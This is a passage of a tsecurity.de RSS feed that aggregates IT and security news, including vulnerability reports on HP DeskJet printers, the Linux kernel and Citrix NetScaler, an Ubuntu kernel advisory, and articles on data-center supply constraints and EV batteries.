<guid isPermaLink="true">https://tsecurity.de/de/3651170/it-security-nachrichten/hp-deskjet-2800-printer-zero-day-flaw-leaks-wi-fi-credentials/</guid>
<pubDate>Tue, 07 Jul 2026 12:24:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>HP DeskJet 2800 series printers are affected by a newly disclosed vulnerability that allows anyone on the same network to access sensitive configuration data without authentication. The flaw, tracked as CVE-2026-13753, affects devices running firmware version TBP1CN2612AR or earlier, and no security update is currently available. The vulnerability was disclosed by the CERT Coordination Center …</p>
<p>The post <a href="https://cyberinsider.com/hp-deskjet-2800-printer-zero-day-flaw-leaks-wi-fi-credentials/">HP DeskJet 2800 printer zero-day flaw leaks Wi-Fi credentials</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Preparing for infrastructure constraints — from memory shortages to power limits]]></title>
<description><![CDATA[Historically, infrastructure planning followed a predictable script. CIOs balanced budgets, refresh cycles and procurement approvals and when demand spiked, the solution was straightforward — find the funding and scale up. The only real constraint was budget.



Today, the biggest constraints are...]]></description>
<link>https://tsecurity.de/de/3651105/it-security-nachrichten/preparing-for-infrastructure-constraints-from-memory-shortages-to-power-limits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651105/it-security-nachrichten/preparing-for-infrastructure-constraints-from-memory-shortages-to-power-limits/</guid>
<pubDate>Tue, 07 Jul 2026 12:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Historically, infrastructure planning followed a predictable script. CIOs balanced budgets, refresh cycles and procurement approvals and when demand spiked, the solution was straightforward — find the funding and scale up. The only real constraint was budget.</p>



<p>Today, the biggest constraints aren’t sitting in spreadsheets; they’re rooted in physical reality. High-bandwidth memory is in short supply. Key server components are harder to secure. Power availability is tightening and cooling capacity is becoming a seriously limiting factor. In many cases, the question is no longer “can we afford it?” but “can we get it at all?”</p>



<p>The surge in AI workloads and the relentless expansion of hyperscale data centers have accelerated this shift. Supply chains that once comfortably met enterprise demand are now stretched thin as hyperscalers vacuum up GPUs, memory and large amounts of energy capacity. What used to be a stable, predictable ecosystem has become challenging territory.</p>



<p>For CIOs, this is forcing a serious rethink. Procurement strategies can no longer assume availability. Refresh cycles are being reconsidered. Even long-held assumptions about where infrastructure should live are being questioned. Perhaps most critically, the constraint is no longer just financial. Increasingly, organisations with approved budgets still find themselves waiting, sometimes months longer than planned, for the infrastructure they need to move forward.</p>



<p>In this new environment, planning isn’t just about spending wisely. It’s about securing access in a world where supply is uncertain.</p>



<h2 class="wp-block-heading">The new infrastructure bottleneck</h2>



<p>Over the past year, much of the conversation has centred on GPU shortages driven by surging AI demand. But the pressure is no longer confined to accelerators; it is spreading across nearly every major infrastructure component. High-bandwidth memory, DIMMs, storage systems, power supplies and even motherboard components are all increasingly subject to allocation constraints. This isn’t creating a temporary imbalance; it’s causing a structural shift.</p>



<p>Previously, semiconductor manufacturers distributed production across a broad mix of markets, from consumer devices to enterprise systems and laptops. AI has disrupted that model. Manufacturing capacity is being pulled toward hyperscale and AI-driven deployments at an unprecedented rate, leaving enterprise buyers competing for a shrinking pool of available supply. For CIOs, the consequences are becoming hard to ignore.</p>



<p>Many organisations are now seeing server costs rise far beyond initial forecasts. While OEM list prices have increased by around <a href="https://www.techradar.com/pro/the-bad-news-continues-server-prices-set-to-rise-in-latest-blow-to-hardware-budget" rel="nofollow">15% to 20%</a>, sharp price spikes in memory and other critical components, in some cases exceeding <a href="https://www.trendforce.com/presscenter/news/20260331-12995.html" rel="nofollow">50%</a>, are pushing total system costs significantly higher.</p>



<p>Lead times that once stretched a few weeks are now measured in months and, in some cases, <a href="https://www.trendforce.com/presscenter/news/20260415-13013.html" rel="nofollow">close to a year</a>. Even the procurement process itself is under strain, with suppliers reportedly holding quotes for as little as 72 hours as they grapple with volatile pricing and uncertain availability. For enterprises used to multi-week internal approval cycles, this creates a new kind of operational friction.</p>



<p>And the disruption doesn’t stop in the data center. As high-performance memory is prioritised for AI workloads, pricing pressure is beginning to ripple into laptops and endpoint devices. Some organisations are revisiting older technologies such as tape backups to bridge capacity gaps while waiting for delayed infrastructure. The result is unexpected strain in markets that were, until recently, stable and predictable.</p>



<p>This leaves many CIOs balancing difficult trade-offs. With fixed budgets, some organisations are simply buying less than planned. Others are delaying projects altogether, waiting for supply to catch up. In response, infrastructure lifecycle strategies are shifting.</p>



<p>Systems that were once refreshed every three to five years are being kept in service for five years or more, with some organisations extending lifecycles to <a href="https://www.investing.com/news/stock-market-news/meta-extends-server-lifespan-amid-memory-chip-shortage--wsj-93CH-4646634?utm_source=chatgpt.com" rel="nofollow">six or even seven years</a> as cost pressures and supply constraints reshape infrastructure strategies. As a result, third-party maintenance providers and pre-owned hardware markets are playing a bigger role, offering a way to extend the life of existing assets while reducing exposure to procurement delays.</p>



<p>In many respects, sustainability goals and operational necessity are beginning to align. Extending infrastructure lifecycles can reduce electronic waste and capital expenditure but it also requires new approaches to maintenance, reliability and performance management. What was once a straightforward refresh decision is now a far more strategic calculation.</p>



<h2 class="wp-block-heading">The physics problem — power, cooling and data center limits</h2>



<p>Supply chain disruption is only part of the challenge. Beneath it lies an even more fundamental constraint — physics.</p>



<p>Modern AI systems require dramatically higher compute density than traditional enterprise workloads. This creates a corresponding increase in power consumption and thermal output, fundamentally changing the design of the modern data center. For decades, many enterprise environments were designed around racks consuming roughly 3kW per cabinet. Today, 50kW racks are becoming increasingly common in AI and high-performance computing environments. Some next-generation GPU deployments are already pushing toward 150kW per rack. That shift changes everything.</p>



<p>Cooling infrastructure designed for traditional enterprise environments is often incapable of handling these thermal loads. As a result, liquid cooling, once considered highly specialised, is rapidly becoming a necessity for many high-density deployments. But cooling is only one part of the equation. The larger issue is power availability itself.</p>



<p>In many regions, hyperscalers have already secured large portions of future energy capacity to support AI expansion. This is creating downstream constraints not only for enterprise data centers but for broader regional infrastructure planning. Utility providers in some markets are quoting five-to seven-year timelines for major power upgrades, meaning organisations can no longer assume they can simply request additional megawatts when needed.</p>



<p>As a result, location strategy is changing. Historically, data center placement often prioritised connectivity, climate and real estate economics but now, the deciding factor is often simply whether power is available. This shift is driving infrastructure expansion into regions that were not previously considered major data center hubs.</p>



<p>Water availability is emerging as another critical issue. Many advanced cooling systems require significant water resources, creating tension between data center growth and sustainability concerns. In some cases, local governments are already scrutinising or limiting expansion because of environmental impact. These dynamics are exposing limitations in how the industry measures efficiency.</p>



<p>Power Usage Effectiveness (PUE) remains one of the most widely used metrics for evaluating data center performance, but it does not always capture overall compute efficiency. A facility may improve its PUE score by operating at higher temperatures, for example, while simultaneously reducing server performance through thermal throttling.</p>



<p>That raises a contentious question for CIOs and infrastructure leaders — should efficiency be measured purely by power consumption, or by the amount of productive compute delivered per watt? As AI workloads scale, that distinction will become increasingly important.</p>



<h2 class="wp-block-heading">How CIOs should respond to long-term infrastructure constraints</h2>



<p>The most important takeaway for enterprise leaders is that these constraints are unlikely to disappear any time soon. Current market conditions suggest that supply pressure, power limitations and infrastructure volatility could continue well into <a href="https://www.cio.com/article/4137534/when-hardware-gets-scarce-endpoint-strategy-becomes-a-boardroom-priority.html">2027</a>. This means CIOs need to shift from short-term mitigation towards long-term resilience planning.</p>



<p>That starts with reassessing infrastructure lifecycle assumptions. Extending hardware longevity will become increasingly common, but doing so successfully requires stronger maintenance strategies, better monitoring and more disciplined asset management. Organisations may also need to diversify sourcing models, incorporating refurbished systems, third-party support and hybrid deployment strategies to reduce dependence on constrained supply chains. Capacity planning must also become more dynamic. Traditional procurement cycles based on predictable refresh schedules may no longer be sufficient in an environment defined by fluctuating availability and pricing.</p>



<p>CIOs will need to collaborate more closely with facilities, operations and sustainability teams. Infrastructure decisions can no longer be isolated within IT departments when power, cooling and water availability directly affect deployment feasibility. Most importantly, organisations may need to rethink what infrastructure optimisation means.</p>



<p>For years, the industry prioritised maximum performance and rapid refresh cycles. The next phase will require balancing performance against availability, efficiency and long-term sustainability.</p>



<p>The AI era is introducing extraordinary opportunities for innovation, but it is also exposing the physical limits of the infrastructure ecosystem supporting it. The organisations that adapt most effectively will be those that recognise infrastructure resilience is no longer just a procurement issue; it is a strategic operational capability.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Europe's new import rules are coming for your bargains]]></title>
<description><![CDATA[Good news if you're an OEM printer maker, EU retail biz, or a customs official... but hobbyists and others less pleased]]></description>
<link>https://tsecurity.de/de/3649232/it-nachrichten/europes-new-import-rules-are-coming-for-your-bargains/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649232/it-nachrichten/europes-new-import-rules-are-coming-for-your-bargains/</guid>
<pubDate>Mon, 06 Jul 2026 17:34:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Good news if you're an OEM printer maker, EU retail biz, or a customs official... but hobbyists and others less pleased]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-54298 | Linux Kernel up to 6.2.4 thermal alloc_soc_dts null pointer dereference (Nessus ID 281479 / WID-SEC-2025-2941)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Linux Kernel up to 6.2.4. Affected is the function alloc_soc_dts of the component thermal. The manipulation leads to null pointer dereference.

This vulnerability is listed as CVE-2023-54298. The attack must be carried out from ...]]></description>
<link>https://tsecurity.de/de/3648328/sicherheitsluecken/cve-2023-54298-linux-kernel-up-to-624-thermal-allocsocdts-null-pointer-dereference-nessus-id-281479-wid-sec-2025-2941/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648328/sicherheitsluecken/cve-2023-54298-linux-kernel-up-to-624-thermal-allocsocdts-null-pointer-dereference-nessus-id-281479-wid-sec-2025-2941/</guid>
<pubDate>Mon, 06 Jul 2026 11:37:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 6.2.4</a>. Affected is the function <code>alloc_soc_dts</code> of the component <em>thermal</em>. The manipulation leads to null pointer dereference.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2023-54298">CVE-2023-54298</a>. The attack must be carried out from within the local network. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8507-1: Linux kernel (NVIDIA) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

Several security issues were discovered in the Linux kernel.
An attacker could...]]></description>
<link>https://tsecurity.de/de/3648226/unix-server/usn-8507-1-linux-kernel-nvidia-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648226/unix-server/usn-8507-1-linux-kernel-nvidia-vulnerabilities/</guid>
<pubDate>Mon, 06 Jul 2026 11:02:06 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Character device driver;
  - TPM device driver;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - LED subsystem;
  - Multiple devices driver;
  - Media drivers;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Remote Processor subsystem;
  - SCSI subsystem;
  - SPI subsystem;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - Thermal drivers;
  - USB Gadget drivers;
  - USB over IP driver;
  - VFIO drivers;
  - Framebuffer layer;
  - 9P distributed file system;
  - AFS file system;
  - Ceph distributed file system;
  - File systems infrastructure;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - Journaling layer for block devices (JBD2);
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - SMB network file system;
  - UDF file system;
  - XFS file system;
  - Codetag library;
  - Memory management;
  - Memory Management;
  - KVM subsystem;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Locking primitives;
  - Timer subsystem;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv4 networking;
  - IPv6 networking;
  - Multipath TCP;
  - Netfilter;
  - NFC subsystem;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SMC sockets;
  - Stream parser;
  - Landlock security;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - Creative Sound Blaster X-Fi driver;
  - QCOM ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43491, CVE-2026-43493,
CVE-2026-43499, CVE-2026-43501, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45988, CVE-2026-45989, CVE-2026-45990, CVE-2026-45991,
CVE-2026-45994, CVE-2026-45995, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46001, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46008, CVE-2026-46009, CVE-2026-46010, CVE-2026-46011,
CVE-2026-46012, CVE-2026-46013, CVE-2026-46014, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46020,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46025, CVE-2026-46026, CVE-2026-46027, CVE-2026-46028,
CVE-2026-46029, CVE-2026-46030, CVE-2026-46031, CVE-2026-46032,
CVE-2026-46033, CVE-2026-46034, CVE-2026-46035, CVE-2026-46036,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46039, CVE-2026-46040,
CVE-2026-46041, CVE-2026-46042, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46045, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46054, CVE-2026-46056, CVE-2026-46057, CVE-2026-46058,
CVE-2026-46059, CVE-2026-46060, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46066,
CVE-2026-46067, CVE-2026-46068, CVE-2026-46069, CVE-2026-46070,
CVE-2026-46071, CVE-2026-46072, CVE-2026-46073, CVE-2026-46074,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46081, CVE-2026-46082,
CVE-2026-46083, CVE-2026-46084, CVE-2026-46085, CVE-2026-46086,
CVE-2026-46087, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46093, CVE-2026-46094,
CVE-2026-46095, CVE-2026-46096, CVE-2026-46097, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46100, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46115, CVE-2026-46119, CVE-2026-46135,
CVE-2026-46137, CVE-2026-46155, CVE-2026-46185, CVE-2026-46195,
CVE-2026-46243, CVE-2026-46244, CVE-2026-46276, CVE-2026-46277,
CVE-2026-46278, CVE-2026-46279, CVE-2026-46280, CVE-2026-46281,
CVE-2026-46282, CVE-2026-46283, CVE-2026-46284, CVE-2026-46285,
CVE-2026-46286, CVE-2026-46287, CVE-2026-46288, CVE-2026-46289,
CVE-2026-46316, CVE-2026-46332, CVE-2026-52904, CVE-2026-52905,
CVE-2026-52906, CVE-2026-52907, CVE-2026-52933)]]></content:encoded>
</item>
<item>
<title><![CDATA[EV Batteries Defy Expectations, Last Hundreds of Thousands of Miles]]></title>
<description><![CDATA[247,000 miles on an EV battery? So says the owner of a U.K.-based used-car sales company that specializes in Evs, who tells the Wall Street Journal EV batteries keep performing well even after several hundred thousand miles. "They are proving themselves to be exceptionally reliable."

After five ...]]></description>
<link>https://tsecurity.de/de/3646727/it-security-nachrichten/ev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646727/it-security-nachrichten/ev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles/</guid>
<pubDate>Sun, 05 Jul 2026 14:53:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[247,000 miles on an EV battery? So says the owner of a U.K.-based used-car sales company that specializes in Evs, who tells the Wall Street Journal EV batteries keep performing well even after several hundred thousand miles. "They are proving themselves to be exceptionally reliable."

After five years on the road, the average EV will still be able to drive up to 95% of its original range, according to Recurrent, a data-science company that provides a battery-monitoring tool for EVs — better than many in the auto industry expected... 

Potential new car buyers' fear of having to pay for a battery replacement is the number one reason they choose to steer clear of EVs, according to a 2025 survey from industry research firm AutoPacific. When early EVs hit the market, buyers' concerns were well-founded. Roughly one in 12 EVs built from 2011 to 2016 have had to have battery replacements. But new data shows that more modern EVs are doing better so far. Among EVs built from 2022 on, 0.3% have had battery replacements, according to a 2025 study from Recurrent. As battery technology has advanced, EVs have avoided problems like the ones that plagued the original Nissan Leaf when it hit the market in 2010, for example. Those cars lacked the battery-cooling technology that is in newer EVs, and they made headlines for wearing down quickly. Buyer perception hasn't quite caught up, according to Scott Case, co-founder and chief executive of Recurrent... 

The newest battery-powered EVs have lifespans comparable to internal-combustion-engine vehicles, even when driven more miles, according to Viet Nguyen-Tien, a research officer at the London School of Economics who focuses on Evs. Improvements in car batteries' chemical contents, battery-management systems and thermal regulation have been the difference in making batteries last longer and cost less, Nguyen-Tien said. Battery prices have fallen more than 90% since 2010, according to a BloombergNEF report from late last year. Industry analysts say battery-replacement costs are also improving as more EVs are designed for repairability in the long-haul. An out-of-warranty battery replacement can cost anywhere from $5,000 to $16,000, depending on the manufacturer, according to Recurrent. But many EV manufacturers have shifted to allow smaller components of their battery packs to be repaired, which can allow owners to avoid the full costs of a battery replacement, Case said. 

EV batteries aren't without their challenges, though. A battery that is frequently fast-charged with high power loses its range, on average, at twice the rate of a battery charged at a lower power, according to telematics company Geotab. Frequently charging a battery to 100%, or letting it rest at 0% for extended periods, can also reduce range long-term. And EVs regularly deliver less range in extreme cold or heat. 
The article also includes two new projections on EV adoption:

"The share of new EVs sold is expected to nearly double to 11% of new-car sales in the U.S. by 2030, according to industry consulting firm AlixPartners."
"Globally, EVs already make up 15% of new-car sales and are expected to form nearly a quarter of the global market by 2030, according to AlixPartners."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=EV+Batteries+Defy+Expectations%2C+Last+Hundreds+of+Thousands+of+Miles%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0434229%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0434229%2Fev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/05/0434229/ev-batteries-defy-expectations-last-hundreds-of-thousands-of-miles?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Printer Setup: Ubuntu, Fedora, and Arch Complete Guide]]></title>
<description><![CDATA[Learn how to set up printers on Linux with CUPS. This guide covers Ubuntu, Fedora, and Arch with verified commands for USB, network, AirPrint, and queue management.]]></description>
<link>https://tsecurity.de/de/3644199/linux-tipps/linux-printer-setup-ubuntu-fedora-and-arch-complete-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644199/linux-tipps/linux-printer-setup-ubuntu-fedora-and-arch-complete-guide/</guid>
<pubDate>Fri, 03 Jul 2026 20:09:49 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn how to set up printers on Linux with CUPS. This guide covers Ubuntu, Fedora, and Arch with verified commands for USB, network, AirPrint, and queue management.]]></content:encoded>
</item>
<item>
<title><![CDATA[Longsoon-CPU: Chinesische Drucker ganz ohne ausländische Technik]]></title>
<description><![CDATA[Der chinesische Druckerhersteller Deli hat erstmals Geräte vorgestellt, die vollständig ohne die Verwendung von Technologien aus westlichen Ländern auskommen. Möglich wird dies unter anderem, weil man eine chinesische Longsoon-CPU verbaut.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3643940/it-security-nachrichten/longsoon-cpu-chinesische-drucker-ganz-ohne-auslaendische-technik/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643940/it-security-nachrichten/longsoon-cpu-chinesische-drucker-ganz-ohne-auslaendische-technik/</guid>
<pubDate>Fri, 03 Jul 2026 18:26:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159758.html"><img hspace="5" border="0" align="left" alt="China, Drucker, printer, Deli" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/91858.png"></a>
			Der chinesische Druckerhersteller Deli hat erstmals Geräte vorgestellt, die vollständig ohne die Verwendung von Technologien aus westlichen Ländern auskommen. Möglich wird dies unter anderem, weil man eine chinesische Longsoon-CPU verbaut.			(<a href="https://winfuture.de/news,159758.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[New CitrixBleed-like NetScaler flaw sees exploit attempts in the wild]]></title>
<description><![CDATA[Citrix NetScaler appliances have been a constant target for attackers in recent years, most recently through an information leak vulnerability dubbed CitrixBleed 3, the latest in a series of NetScaler memory overreads going back to 2023. This week, Citrix patched yet another CitrixBleed-like vuln...]]></description>
<link>https://tsecurity.de/de/3643441/it-security-nachrichten/new-citrixbleed-like-netscaler-flaw-sees-exploit-attempts-in-the-wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643441/it-security-nachrichten/new-citrixbleed-like-netscaler-flaw-sees-exploit-attempts-in-the-wild/</guid>
<pubDate>Fri, 03 Jul 2026 13:53:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Citrix NetScaler appliances have been a constant target for attackers in recent years, most recently through an information leak vulnerability dubbed CitrixBleed 3, the latest in a series of NetScaler memory overreads going back to 2023. This week, Citrix patched yet another CitrixBleed-like vulnerability and there are signs of in-the-wild exploitation already.</p>



<p>The new memory overread vulnerability, tracked as CVE-2026-8451, was found by researchers from security firm watchTowr who published <a href="https://labs.watchtowr.com/citrixbleed-to-infinity-and-beyond-citrix-netscaler-pre-auth-memory-overread-cve-2026-8451/" target="_blank" rel="noreferrer noopener">a detailed write-up</a> showing how unauthenticated malformed requests can result in protected process memory data being leaked back in responses.</p>



<p>The original <a href="https://www.csoonline.com/article/657085/citrix-urges-immediate-patching-of-critically-vulnerable-product-lines.html">CitrixBleed (CVE-2023-4966),</a> <a href="https://www.csoonline.com/article/4019802/exploit-details-released-for-citrix-bleed-2-flaw-affecting-netscaler.html">CitrixBleed 2 (CVE-2025–5777)</a>, and <a href="https://www.csoonline.com/article/4150224/new-critical-citrix-netscaler-hole-of-similar-severity-to-citrixbleed2-says-expert.html">CitrixBleed 3 (CVE-2026-3055)</a> vulnerabilities were all rated critical because they could be used to leak session tokens and other credentials stored in memory. The new CVE-2026-8451 can only be used to leak much smaller amounts of data which do not appear to include session IDs. For this reason, <a href="https://community.citrix.com/techzone-blogs/110_security-updates/security-update-for-citrix-netscaler-and-netscaler-gateway-customers-r1570/" target="_blank" rel="noreferrer noopener">Citrix gave it a CVSS score of 8.8</a> (high severity).</p>



<p>For exploitation to be possible, the NetScaler appliance needs to be configured as a SAML Identity Provider, but this was also the case for CitrixBleed 3, which was patched in March and was subsequently exploited in the wild.</p>



<p>So, this requirement doesn’t mean attacks are unlikely or that this configuration is uncommon. In fact, less than 24 hours after the Citirix patch, security firm Lupovis <a href="https://www.lupovis.io/lupovis-insights/" target="_blank" rel="noreferrer noopener">reported seeing exploitation attempts hitting its honeypot sensors</a>.</p>



<p>“Three separate sensors were targeted within a five-hour window,” the company said. “The actor received a 200 response on the third sensor and immediately delivered the exploit payload.”</p>



<h2 class="wp-block-heading">Smaller leak but still dangerous</h2>



<p>Even though watchTowr was only able to leak bytes of data using this flaw, compared to kilobytes with previous CitrixBleed issues, the exposed information could still be useful to attackers.</p>



<p>While the proof-of-concept did not reveal credentials or tokens, it’s possible that repeated requests would eventually be able to leak something sensitive. At the very least, the leaks can expose process memory pointers that could allow attackers to more easily deliver payloads using memory write vulnerabilities such as buffer overflows.</p>



<p>By overwriting data in a memory location that normally contains code the process executes, attackers could bypass anti-exploitation defenses like ASLR to take full control of the device.</p>



<p>As part of this same patch cycle Citrix also addressed two high-severity memory overflow vulnerabilities, tracked as CVE-2026-8452 and CVE-2026-8655. Chaining exploits for different vulnerabilities is a common approach in modern attacks.</p>



<p>The company also patched an unauthenticated arbitrary file read (CVE-2026-10816), another out-of-bounds memory overread (CVE-2026-10817) and a denial-of-service issue exploitable through HTTP/2 requests (CVE-2026-13474). The latter is actually a NetScaler-specific instance of the <a href="https://www.csoonline.com/article/4181313/http-2s-speed-abused-to-slow-webserver-performance-in-dos-attack.html">HTTP/2 Bomb vulnerability (CVE-2026-49975) patched recently in Apache Web Server</a>.</p>



<h2 class="wp-block-heading">Mitigation</h2>



<p>Citrix advises customers to upgrade their NetScaler ADC and NetScaler Gateway appliances to versions 14.1-72.61, 14.1-72.61 FIPS, 13.1-63.18, 13.1-FIPS and 13.1-NDcPP 13.1.37.272. The HTTP/2 Bomb vulnerability also requires configuration changes in addition to the patches.</p>



